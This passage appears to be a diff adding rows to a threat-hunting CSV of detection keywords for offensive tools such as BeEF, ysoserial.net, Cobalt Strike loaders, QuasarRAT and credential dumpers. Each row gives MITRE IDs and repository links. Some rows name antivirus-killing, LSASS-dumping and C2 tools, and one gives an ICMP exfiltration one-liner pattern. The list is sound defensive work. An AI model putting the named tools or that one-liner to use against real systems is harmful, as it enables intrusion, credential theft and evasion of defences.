+"*xssrays.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*xssrays_spec.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*xssraysdetail.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*xssraysscan.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*XSStrike*","offensive_tool_keyword","XSStrike","Advanced XSS detection and exploitation suite.","T1189","TA0001","N/A","N/A","Exploitation tools","https://github.com/UltimateHackers/XSStrike","1","0","N/A","N/A","10","12024","1823","2023-08-05T13:49:45Z","2017-06-26T07:24:44Z"
+"*xxd -p -c 4 /* | while read line* do ping -c 1 -p *","greyware_tool_keyword","xxd","ICMP Tunneling One Liner","T1090 - T1002 - T1016","TA0011 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
+"*XXEinjector*","offensive_tool_keyword","XXEinjector","XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. 
Bruteforcing method needs to be used for other applications.","T1573.001 - T1573.002 - T1574","TA0007 - ","N/A","N/A","Web Attacks","https://github.com/enjoiz/XXEinjector","1","1","N/A","N/A","10","1363","311","2020-08-27T12:33:26Z","2015-05-16T10:56:14Z"
+"*xxePayloads.ini*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z"
+"*XX-PHISHING-LINK-XX*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z"
+"*X-YSOSERIAL-NET*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z"
+"*xZF7fvaGD6p2yeLyf9i7O9gBBHk05B0u*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
+"*xzfbmR6MskR8J6Zr58RrhMc325kejLJE*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*Y29iYWx0c3RyaWtl*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*Y2F0Y2hldHVtYm90aWZ5b3VjYW4-*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used 
for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*yanncam/ShuckNT*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z"
+"*YaraFilters*lsassdump.yar*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z"
+"*yasserjanah/CVE-2020-5902*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","1","N/A","N/A","1","37","13","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z"
+"*YaWNdpwplLwycqWQDCyruhAFsYjWjnBA*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*Yaxser/Backstab*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" +"*Yay! No SYSMON here!*","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","0","N/A","N/A","1","81","15","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" +"*YDHCUI/csload.net*","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","10","10","123","13","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z" +"*YDHCUI/manjusaka*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" +"*yeelight_discover.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*Yh0Js82rIfFEbS6pR7oUkN0Use54pIZBa3fpYprAMuURNrZZGc6cM8dc+AC*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. 
the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"*ylAo2kAlUS2kYkala!*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. 
Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*Yml0c3kubWl0LmVkdQ==*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*YmpwZW5uaXNhbmF3ZXNvbWVmaWdodGVy*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*YmxvY2s9MTAw*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"*yogeshojha/rengine*","offensive_tool_keyword","rengine","reNgine is an automated reconnaissance framework for web applications with a focus on highly configurable streamlined recon process via Engines recon data correlation and organization continuous monitoring backed by a database and simple yet intuitive User Interface. 
reNgine makes it easy for penetration testers to gather reconnaissance with","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/yogeshojha/rengine","1","1","N/A","N/A","10","5913","923","2023-10-02T14:05:29Z","2020-05-03T12:13:12Z"
+"*YOLOP0wn/POSTDump*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z"
+"*You are trying to target a User Group Policy Object while running the embedded SMB server*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z"
+"*You_spin_me__round.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). 
Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" +"*youcantpatchthis*","offensive_tool_keyword","cobaltstrike","Example code for using named pipe output with beacon ReflectiveDLLs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rxwx/cs-rdll-ipc-example","1","0","N/A","10","10","101","24","2020-06-24T19:47:35Z","2020-06-24T19:43:56Z" +"*youhacker55/PayGen*","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A",,"N/A",,, +"*Your Moms Smart Vibrator*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","user-agent","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*ysoserial -*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*ysoserial-*.zip","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*ysoserial.exe *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*ysoserial.exe*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","104","33","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" +"*ysoserial.net*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*ysoserial.sln*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*yunuscadirci/CallStranger*","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/yunuscadirci/CallStranger","1","1","N/A","N/A","4","391","70","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z" +"*Yuuup!! 
Pass Cracked*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*YwBhAGwAYwA=*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Z29oYWxleWdvYW5kaGFja2F3YXl0aGVnaWJzb24*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation 
tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*Z4nzu/hackingtool*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*zabbix_session_exp.py -*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py","1","0","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z" +"*zabbix_session_exp.py https*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1505 - T1550 - T1574 - T1210 - T1110","TA0001 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Fa1c0n35/zabbix-cve-2022-23131","1","0","N/A","N/A","1","0","0","2022-02-27T11:31:02Z","2022-02-27T11:30:53Z" +"*zabbix_session_exp.py*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/cve-2022-23131","1","1","N/A","N/A","2","146","48","2022-02-24T15:02:12Z","2022-02-18T11:51:47Z" +"*zarp.py*","offensive_tool_keyword","zarp","A network attack framework.","T1484 - T1498 - T1569","TA0001 
- TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/hatRiot/zarp","1","0","N/A","N/A","10","1376","340","2023-05-01T20:18:05Z","2012-09-16T18:02:34Z" +"*zblurx/certsync*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","1","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z" +"*zblurx/dploot*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","1","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" +"*zcgonvh/DCOMPotato*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" +"*zed2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*zenmap.exe*","greyware_tool_keyword","nmap","When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. 
and potential vulnerabilities in target systems.","T1046 - T1065 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*zenoss_3x_command_execution*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*zer0condition/mhydeath*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*zeroday-powershell*","offensive_tool_keyword","zeroday-powershell","This will exploit the Windows operating system allowing you to modify the file Some.dll.","T1203 - T1574.001 - T1546.011","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/OneLogicalMyth/zeroday-powershell","1","1","N/A","N/A","4","323","96","2018-09-12T09:03:04Z","2018-09-10T16:34:14Z" +"*zerologon clone *https*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 